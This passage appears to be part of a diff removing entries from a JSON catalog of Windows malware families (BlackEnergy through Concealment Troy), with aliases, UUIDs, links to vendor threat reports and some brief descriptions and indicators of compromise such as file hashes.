displaying a police-themed message in German language." 
- }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackenergy", - "https://securelist.com/be2-custom-plugins-router-abuse-and-target-profiles/67353/", - "https://securelist.com/be2-extraordinary-plugins-siemens-targeting-dev-fails/68838/", - "https://securelist.com/blackenergy-apt-attacks-in-ukraine-employ-spearphishing-with-word-documents/73440/" - ] - }, - "uuid": "82c644ab-550a-4a83-9b35-d545f4719069", - "value": "BlackEnergy", - "description": "" - }, - { - "meta": { - "synonyms": [ - "POSWDS", - "Reedum", - "Kaptoxa" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackpos", - "https://blog.trendmicro.com/trendlabs-security-intelligence/new-blackpos-malware-emerges-in-the-wild-targets-retail-accounts/" - ] - }, - "uuid": "1e62fc1f-daa7-416f-9159-099798bb862c", - "value": "BlackPOS", - "description": "BlackPOS infects computers running on Windows that have credit card readers connected to them and are part of a POS system. POS system computers can be easily infected if they do not have the most up to date operating systems and antivirus programs to prevent security breaches or if the computer database systems have weak administration login credentials. 
" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackrevolution", - "https://www.arbornetworks.com/blog/asert/the-revolution-will-be-written-in-delphi/" - ] - }, - "uuid": "6a5bd819-5fbc-437b-92c4-ce0dfb5c67f8", - "value": "BlackRevolution", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackshades", - "https://blog.malwarebytes.com/threat-analysis/2014/05/taking-off-the-blackshades/", - "https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-2-blackshades-net/", - "https://blog.malwarebytes.com/threat-analysis/2012/06/blackshades-in-syria/", - "http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html" - ] - }, - "uuid": "0fb57d46-1c4f-49a3-80c2-05bcaa34ec1b", - "value": "BlackShades", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.boaxxe", - "https://www.welivesecurity.com/2014/03/18/operation-windigo-the-vivisection-of-a-large-linux-server-side-credential-stealing-malware-campaign/" - ] - }, - "uuid": "2f11eb73-4faa-48c5-b217-11e139962c6f", - "value": "Boaxxe", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.bohmini" - ] - }, - "uuid": "444ca9d1-7128-40fa-9665-654194dfbe0b", - "value": "Bohmini", - "description": "" - }, - { - "meta": { - "synonyms": [ - "KBOT" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.bolek", - "https://asert.arbornetworks.com/communications-bolek-trojan/", - "http://www.cert.pl/news/11379" - ] - }, - "uuid": "d3af810f-e657-409c-b821-4b1cf727ad18", - "value": "Bolek", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.bouncer", - "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] - }, - "uuid": "80487bca-7629-4cb2-bf5b-993d5568b699", - "value": "Bouncer", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.bozok", - "https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-rapidly-evolving-apt-actor.html" - ] - }, - "uuid": "f9d0e934-879c-4668-b959-6bf7bdc96f5d", - "value": "Bozok", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.brambul", - "https://www.us-cert.gov/ncas/alerts/TA18-149A", - "https://www.us-cert.gov/ncas/analysis-reports/AR18-149A", - "https://www.acalvio.com/lateral-movement-technique-employed-by-hidden-cobra/" - ] - }, - "uuid": "d97ae60e-612a-4feb-908a-8c4d32e9d763", - "value": "Brambul", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.bravonc", - "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group" - ] - }, - "uuid": "fbed27da-551d-4793-ba7e-128256326909", - "value": "BravoNC", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.breakthrough_loader", - "https://malpedia.caad.fkie.fraunhofer.de" - ] - }, - "uuid": "a05b8e4b-a686-439f-8094-037fbcda52bd", - "value": "Breakthrough", - "description": "There is no reference available for this family and all known samples have version 1.0.0.\r\n\r\nPdb-strings in the samples suggest that this is an \"exclusive\" loader, known as \"breakthrough\" (maybe), e.g. 
C:\\Users\\Exclusiv\\Desktop\\\u0445\u043f-\u043f\u0440\u043e\u0431\u0438\u0432\\Release\\build.pdb\r\n\r\nThe communication url parameters are pretty unique in this combination:\r\ngate.php?hwid=&os=&build=1.0.0&cpu=8\r\n\r\n is one of:\r\nWindows95\r\nWindows98\r\nWindowsMe\r\nWindows95family\r\nWindowsNT3\r\nWindowsNT4\r\nWindows2000\r\nWindowsXP\r\nWindowsServer2003\r\nWindowsNTfamily\r\nWindowsVista\r\nWindows7\r\nWindows8\r\nWindows10\r\n" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.bredolab", - "https://www.fireeye.com/blog/threat-research/2010/10/bredolab-its-not-the-size-of-the-dog-in-fight.html", - "https://securelist.com/end-of-the-line-for-the-bredolab-botnet/36335/" - ] - }, - "uuid": "55d343a1-7e80-4254-92eb-dfb433b91a90", - "value": "Bredolab", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.brutpos", - "https://www.fireeye.com/blog/threat-research/2014/07/brutpos-rdp-bruteforcing-botnet-targeting-pos-systems.html" - ] - }, - "uuid": "e413c33a-badd-49a1-8d44-c9a0983b5151", - "value": "BrutPOS", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.bs2005", - "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", - "https://github.com/nccgroup/Royal_APT" - ] - }, - "uuid": "35e00ff0-704e-4e61-b9bb-9ed20a4a008f", - "value": "BS2005", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.btcware", - "https://www.bleepingcomputer.com/news/security/new-nuclear-btcware-ransomware-released-updated/" - ] - }, - "uuid": "d29786c6-2cc0-4e2f-97b0-242a1d9e9bf8", - "value": "BTCWare", - "description": "" - }, - { - "meta": { - "synonyms": 
[], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.bugat_alreadydump" - ] - }, - "uuid": "16794655-c0e2-4510-9169-f862df104045", - "value": "Bugat", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Ratopak" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.buhtrap", - "https://www.arbornetworks.com/blog/asert/diving-buhtrap-banking-trojan-activity/", - "https://www.symantec.com/connect/blogs/russian-bank-employees-received-fake-job-offers-targeted-email-attack", - "https://www.group-ib.com/brochures/gib-buhtrap-report.pdf", - "https://www.welivesecurity.com/2015/04/09/operation-buhtrap/" - ] - }, - "uuid": "fa278536-8293-4717-86b5-8a03aa11063f", - "value": "Buhtrap", - "description": "" - }, - { - "meta": { - "synonyms": [ - "R2D2", - "0zapftis" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.bundestrojaner", - "http://www.ccc.de/system/uploads/76/original/staatstrojaner-report23.pdf", - "http://www.stoned-vienna.com/analysis-of-german-bundestrojaner.html", - "https://www.f-secure.com/weblog/archives/00002249.html", - "https://www.f-secure.com/weblog/archives/00002249.html" - ] - }, - "uuid": "04aeda9f-7923-45d1-ab74-9dddd8612d47", - "value": "Bundestrojaner", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.bunitu", - "https://blog.malwarebytes.com/threat-analysis/2015/07/revisiting-the-bunitu-trojan/", - "https://blog.malwarebytes.com/threat-analysis/2015/08/whos-behind-your-proxy-uncovering-bunitus-secrets/", - "http://malware-traffic-analysis.net/2017/05/09/index.html", - "https://zerophagemalware.com/2017/06/07/rig-ek-via-fake-eve-online-website-drops-bunitu/" - ] - }, - "uuid": "4350b52a-8100-49b5-848d-d4a4029e949d", - "value": "Bunitu", - "description": "Bunitu is a trojan that exposes infected computers to be used as a proxy for remote clients. 
It registers itself at startup by providing its address and open ports. Access to Bunitu proxies is available by using criminal VPN services (e.g.VIP72)." - }, - { - "meta": { - "synonyms": [ - "spyvoltar" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.buterat", - "http://antivirnews.blogspot.com/2011/01/backdoorwin32-buteratafj.html" - ] - }, - "uuid": "cd4ee7f0-394e-4129-a1dc-d5fb423f2311", - "value": "Buterat", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.buzus" - ] - }, - "uuid": "69a3e0ed-1727-4a9c-ae21-1e32322ede93", - "value": "Buzus", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.byeby", - "https://researchcenter.paloaltonetworks.com/2017/09/unit42-threat-actors-target-government-belarus-using-cmstar-trojan" - ] - }, - "uuid": "12886243-55b6-4864-bf7a-7e2439e3a4c1", - "value": "BYEBY", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.c0d0so0" - ] - }, - "uuid": "b6b187d0-e19f-489a-91c0-7c94519555f6", - "value": "c0d0so0", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.cabart" - ] - }, - "uuid": "fe1d51d8-f0e8-4f71-bf5c-724f7d4a824c", - "value": "CabArt", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Cadelle" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.cadelspy", - "http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/CadelSpy-Remexi-IOC.pdf" - ] - }, - "uuid": "cad83c5e-2081-4ab4-81c7-32cfc16eae66", - "value": "CadelSpy", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.camubot", - "https://securityintelligence.com/camubot-new-financial-malware-targets-brazilian-banking-customers/" - ] - }, - "uuid": "ecac83ab-cd64-4def-979a-40aeeca0400b", - "value": "CamuBot", - "description": "There is no lot of IOCs in this article so we take one sample and try to extract some interesting IOCs, our findings below :\r\n\r\nCamuBot sample : 37ca2e37e1dc26d6b66ba041ed653dc8ee43e1db71a705df4546449dd7591479\r\n\r\nDropped Files on disk :\r\n\r\nC:\\Users\\user~1\\AppData\\Local\\Temp\\protecao.exe : 0af612461174eedec813ce670ba35e74a9433361eacb3ceab6d79232a6fe13c1\r\n\r\nC:\\Users\\user~1\\AppData\\Local\\Temp\\Renci.SshNet.dll : 3E3CD9E8D94FC45F811720F5E911B892A17EE00F971E498EAA8B5CAE44A6A8D8\r\n\r\nC:\\ProgramData\\m.msi : AD90D4ADFED0BDCB2E56871B13CC7E857F64C906E2CF3283D30D6CFD24CD2190\r\n\r\nProtecao.exe try to download hxxp://www.usb-over-network.com/usb-over-network-64bit.msi\r\n\r\nA new driver is installed : C:\\Windows\\system32\\drivers\\ftusbload2.sys : 9255E8B64FB278BC5FFE5B8F70D68AF8\r\n\r\nftusbload2.sys set 28 IRP handlers." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.cannibal_rat", - "http://blog.talosintelligence.com/2018/02/cannibalrat-targets-brazil.html" - ] - }, - "uuid": "1e722d81-085e-4beb-8901-aa27fe502dba", - "value": "Cannibal Rat", - "description": "Cannibal Rat is a python written remote access trojan with 4 versions as of March 2018. The RAT is reported to impact users of a Brazilian public sector management school. The RAT is distributed in a py2exe format, with the python27.dll and the python bytecode stored as a PE resource and the additional libraries zipped in the overlay of the executable." 
- }, - { - "meta": { - "synonyms": [ - "Anunak" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.carbanak", - "https://securelist.com/files/2015/02/Carbanak_APT_eng.pdf", - "https://www.fox-it.com/en/wp-content/uploads/sites/11/Anunak_APT-against-financial-institutions2.pdf", - "https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html" - ] - }, - "uuid": "8c246ec4-eaa5-42c0-b137-29f28cbb6832", - "value": "Carbanak", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.carberp" - ] - }, - "uuid": "8f0d4866-7c67-4376-a6f2-958224d3c9d0", - "value": "Carberp", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.cardinal_rat", - "http://researchcenter.paloaltonetworks.com/2017/04/unit42-cardinal-rat-active-two-years/?adbsc=social71702736&adbid=855028404965433346&adbpl=tw&adbpr=4487645412" - ] - }, - "uuid": "3d3da4c0-004c-400c-9da6-f83fd35d907e", - "value": "Cardinal RAT", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.casper", - "https://www.welivesecurity.com/2015/03/05/casper-malware-babar-bunny-another-espionage-cartoon/" - ] - }, - "uuid": "3198501e-0ff0-43b7-96f0-321b463ab656", - "value": "Casper", - "description": "ESET describes Casper as a well-developed reconnaissance tool, making extensive efforts to remain unseen on targeted machines. Of particular note are the specific strategies adopted against anti-malware software. Casper was used against Syrian targets in April 2014, which makes it the most recent malware from this group publicly known at this time." 
- }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.catchamas", - "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets" - ] - }, - "uuid": "8060dbdc-cf31-40bc-9900-eb8119423c50", - "value": "Catchamas", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.ccleaner_backdoor", - "https://blog.avast.com/new-investigations-in-ccleaner-incident-point-to-a-possible-third-stage-that-had-keylogger-capacities", - "https://www.crowdstrike.com/blog/protecting-software-supply-chain-deep-insights-ccleaner-backdoor/", - "http://www.intezer.com/evidence-aurora-operation-still-active-part-2-more-ties-uncovered-between-ccleaner-hack-chinese-hackers/", - "https://blog.avast.com/avast-threat-labs-analysis-of-ccleaner-incident", - "http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html", - "http://www.intezer.com/evidence-aurora-operation-still-active-supply-chain-attack-through-ccleaner/", - "https://blog.avast.com/progress-on-ccleaner-investigation", - "https://www.wired.com/story/ccleaner-malware-targeted-tech-firms", - "https://blog.avast.com/update-ccleaner-attackers-entered-via-teamviewer", - "https://twitter.com/craiu/status/910148928796061696", - "https://blog.avast.com/additional-information-regarding-the-recent-ccleaner-apt-security-incident", - "http://blog.morphisec.com/morphisec-discovers-ccleaner-backdoor", - "https://www.crowdstrike.com/blog/in-depth-analysis-of-the-ccleaner-backdoor-stage-2-dropper-and-its-payload/", - "http://blog.talosintelligence.com/2017/09/ccleaner-c2-concern.html" - ] - }, - "uuid": "c51ee09b-fc2d-41fd-a43b-426a4f337139", - "value": "CCleaner Backdoor", - "description": "" - }, - { - "meta": { - "synonyms": [ - "cerebrus" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.centerpos", - 
"https://www.fireeye.com/blog/threat-research/2016/01/centerpos_an_evolvi.html" - ] - }, - "uuid": "fca8c5e0-4fef-408c-bcd7-9826271e8e5d", - "value": "CenterPOS", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.cerber", - "http://blog.trendmicro.com/trendlabs-security-intelligence/cerber-starts-evading-machine-learning/", - "https://blog.malwarebytes.com/threat-analysis/2016/03/cerber-ransomware-new-but-mature/", - "https://www.virusbulletin.com/virusbulletin/2017/12/vb2017-paper-nine-circles-cerber/", - "https://rinseandrepeatanalysis.blogspot.com/2018/08/reversing-cerber-raas.html" - ] - }, - "uuid": "79a7203a-6ea5-4c39-abd4-faa20cf8821a", - "value": "Cerber", - "description": "A prolific ransomware which originally added \".cerber\" as a file extension to encrypted files. Has undergone multiple iterations in which the extension has changed. Uses a very readily identifiable set of of UDP activity to checkin and report infections. Primarily uses TOR for payment information." 
- }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.cerbu_miner" - ] - }, - "uuid": "ba7706c1-7d2a-4031-9acc-cb862860da1a", - "value": "Cerbu", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Ham Backdoor" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.chches", - "https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html", - "https://www.jpcert.or.jp/magazine/acreport-ChChes_ps1.html", - "https://www.jpcert.or.jp/magazine/acreport-ChChes.html", - "http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/", - "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf" - ] - }, - "uuid": "6eee9bf9-ffce-4c88-a5ad-9d80f6fc727c", - "value": "ChChes", - "description": "" - }, - { - "meta": { - "synonyms": [ - "cherrypickerpos", - "cherrypicker", - "cherry_picker" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.cherry_picker", - "https://www.trustwave.com/Resources/SpiderLabs-Blog/Shining-the-Spotlight-on-Cherry-Picker-PoS-Malware/", - "https://www.trustwave.com/Resources/SpiderLabs-Blog/New-Memory-Scraping-Technique-in-Cherry-Picker-PoS-Malware/" - ] - }, - "uuid": "e6ab90d3-8011-4927-a0cd-eab57e7971aa", - "value": "CherryPicker POS", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.chewbacca", - "http://vinsula.com/2014/03/01/chewbacca-tor-based-pos-malware/" - ] - }, - "uuid": "2137a0ce-8d06-4538-ad0b-6ab6ec865493", - "value": "ChewBacca", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.chinad" - ] - }, - "uuid": "098cfb93-8921-48f0-a694-a83f350e8a61", - "value": "Chinad", - "description": "Adware that shows 
advertisements using plugin techniques for popular browsers" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.chir" - ] - }, - "uuid": "59b5697a-5154-4c08-87f8-c71b0e8425fc", - "value": "Chir", - "description": "" - }, - { - "meta": { - "synonyms": [ - "AndroKINS" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.chthonic", - "https://www.proofpoint.com/us/threat-insight/post/threat-actors-using-legitimate-paypal-accounts-to-distribute-chthonic-banking-trojan", - "https://www.s21sec.com/en/blog/2017/07/androkins/", - "https://securelist.com/chthonic-a-new-modification-of-zeus/68176/" - ] - }, - "uuid": "9441a589-e23d-402d-9603-5e55e3e33971", - "value": "Chthonic", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.citadel", - "https://blog.malwarebytes.com/threat-analysis/2012/11/citadel-a-cyber-criminals-ultimate-weapon/", - "http://www.xylibox.com/2016/02/citadel-0011-atmos.html", - "http://blog.jpcert.or.jp/2016/02/banking-trojan--27d6.html", - "https://www.arbornetworks.com/blog/asert/the-citadel-and-gameover-campaigns-of-5cb682c10440b2ebaf9f28c1fe438468/" - ] - }, - "uuid": "7f550cae-98b7-4a0c-bed2-d79227dc6310", - "value": "Citadel", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.client_maximus", - "https://securityintelligence.com/client-maximus-new-remote-overlay-malware-highlights-rising-malcode-sophistication-in-brazil/" - ] - }, - "uuid": "c2bd0771-55d6-4242-986d-4bfd735998ba", - "value": "Client Maximus", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.cloud_duke", - "https://www.f-secure.com/weblog/archives/00002822.html" - ] - }, - "uuid": 
"40baac36-2fd0-49b3-b05b-1087d60f4f2c", - "value": "Cloud Duke", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.cmsbrute", - "https://securelist.com/the-shade-encryptor-a-double-threat/72087/" - ] - }, - "uuid": "ad960c5c-f2a1-405e-a32a-31f75b7c6859", - "value": "CMSBrute", - "description": "" - }, - { - "meta": { - "synonyms": [ - "meciv" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.cmstar", - "https://researchcenter.paloaltonetworks.com/2016/03/digital-quartermaster-scenario-demonstrated-in-attacks-against-the-mongolian-government/", - "https://researchcenter.paloaltonetworks.com/2017/09/unit42-threat-actors-target-government-belarus-using-cmstar-trojan", - "https://twitter.com/ClearskySec/status/963829930776723461", - "https://www.votiro.com/single-post/2018/02/13/New-campaign-targeting-Ukrainians-holds-secrets-in-documents-properties" - ] - }, - "uuid": "e4e15ab4-9ba6-444a-b154-2854757e792e", - "value": "CMSTAR", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike", - "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", - "https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html", - "https://blog.cobaltstrike.com/2018/04/09/cobalt-strike-3-11-the-snake-that-eats-its-tail/", - "https://www.lac.co.jp/lacwatch/people/20180521_001638.html" - ] - }, - "uuid": "1a1d3ea4-972e-4c48-8d85-08d9db8f1550", - "value": "Cobalt Strike", - "description": "Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. 
Beacon includes a wealth of functionality to the attacker, including, but not limited to:\r\n\r\n* Execute commands\r\n* Log keystrokes\r\n* Upload/download files\r\n* SOCKS proxy\r\n* Privilege escalation\r\n* Mimikatz\r\n* Port scanning\r\n* Lateral Movement\r\n\r\nThe Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobian_rat", - "https://www.zscaler.com/blogs/research/cobian-rat-backdoored-rat", - "https://securityaffairs.co/wordpress/62573/malware/cobian-rat-backdoor.html" - ] - }, - "uuid": "aa553bbd-f6e4-4774-9ec5-4607aa2004b8", - "value": "Cobian RAT", - "description": "" - }, - { - "meta": { - "synonyms": [ - "COOLPANTS" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobint", - "https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-part-3-cobint", - "https://www.group-ib.com/blog/renaissance", - "https://asert.arbornetworks.com/double-the-infection-double-the-fun/" - ] - }, - "uuid": "23160942-6de6-41c0-8d8c-44876191c3f0", - "value": "CobInt", - "description": "CobInt, is a self-developed backdoor of the Cobalt group. The modular tool has capabilities to collect initial intelligence information about the compromised machine and stream video from its desktop. If the operator decides that the system is of interest, the backdoor will download and launch CobaltStrike framework stager." 
- },
- {
- "meta": {
- "synonyms": [
- "Carbon"
- ],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobra",
- "https://blog.gdatasoftware.com/2015/01/23926-analysis-of-project-cobra",
- "https://www.melani.admin.ch/dam/melani/de/dokumente/2016/technical%20report%20ruag.pdf.download.pdf/Report_Ruag-Espionage-Case.pdf",
- "https://securelist.com/analysis/publications/65545/the-epic-turla-operation/",
- "https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/",
- "https://github.com/hfiref0x/TDL"
- ]
- },
- "uuid": "f75452f3-6a4a-4cd6-b3e0-089fa320e9b9",
- "value": "Cobra Carbon System",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.cockblocker",
- "https://twitter.com/JaromirHorejsi/status/817311664391524352"
- ]
- },
- "uuid": "77e85a95-6a78-4255-915a-488eb73ee82f",
- "value": "CockBlocker",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.codekey",
- "https://www.rsa.com/content/dam/pdfs/2-2017/kingslayer-a-supply-chain-attack.pdf"
- ]
- },
- "uuid": "cb5bad79-707c-493d-8a2b-4c0be38301c5",
- "value": "CodeKey",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.cohhoc",
- "https://public.gdatasoftware.com/Presse/Publikationen/Whitepaper/EN/GDATA_TooHash_CaseStudy_102014_EN_v1.pdf"
- ]
- },
- "uuid": "9481d7b1-307c-4504-9333-21720b85317b",
- "value": "Cohhoc",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.coinminer",
- "https://secrary.com/ReversingMalware/CoinMiner/",
- "https://blog.malwarebytes.com/threat-analysis/2018/01/a-coin-miner-with-a-heavens-gate/amp/"
- ]
- },
- "uuid": "333e2e87-b9b0-4e2e-9ed9-7259c55a93db",
-
"value": "Coinminer",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [
- "Bandios",
- "GrayBird"
- ],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.colony",
- "https://twitter.com/anyrun_app/status/976385355384590337",
- "https://secrary.com/ReversingMalware/Colony_Bandios/",
- "https://pastebin.com/GtjBXDmz"
- ]
- },
- "uuid": "4db94d24-209a-4edd-b175-3a3085739b94",
- "value": "Colony",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.combojack",
- "https://researchcenter.paloaltonetworks.com/2018/03/unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency/"
- ]
- },
- "uuid": "150cde2c-ae36-4fa5-8d8d-8dedc3de43de",
- "value": "Combojack",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.combos",
- "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf"
- ]
- },
- "uuid": "2b71a966-da08-4467-a785-cb6abf2fa65e",
- "value": "Combos",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.comodosec",
- "https://techhelplist.com/down/malware-ransom-comodosec-mrcr1.txt"
- ]
- },
- "uuid": "bdecbbe9-7646-40cd-a9f3-86a20b13e6da",
- "value": "ComodoSec",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [
- "lojack"
- ],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.computrace",
- "https://asert.arbornetworks.com/lojack-becomes-a-double-agent/",
- "https://bartblaze.blogspot.de/2014/11/thoughts-on-absolute-computrace.html",
- "https://www.absolute.com/en/resources/faq/absolute-response-to-arbor-lojack-research",
- "https://www.lastline.com/labsblog/apt28-rollercoaster-the-lowdown-on-hijacked-lojack/"
- ]
- },
- "uuid":
"d24882f9-8645-4f6a-8a86-2f85daaad685",
- "value": "Computrace",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.comrade_circle",
- "https://twitter.com/struppigel/status/816926371867926528"
- ]
- },
- "uuid": "634f1977-6cba-4ad7-9501-09e1eaefde56",
- "value": "ComradeCircle",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.concealment_troy",
- "https://www.mcafee.com/enterprise/en-us/assets/white-papers/wp-dissecting-operation-troy.pdf",
- "http://www.malware-reversing.com/2013/04/5-south-korea-incident-new-malware.html"
- ]
- },
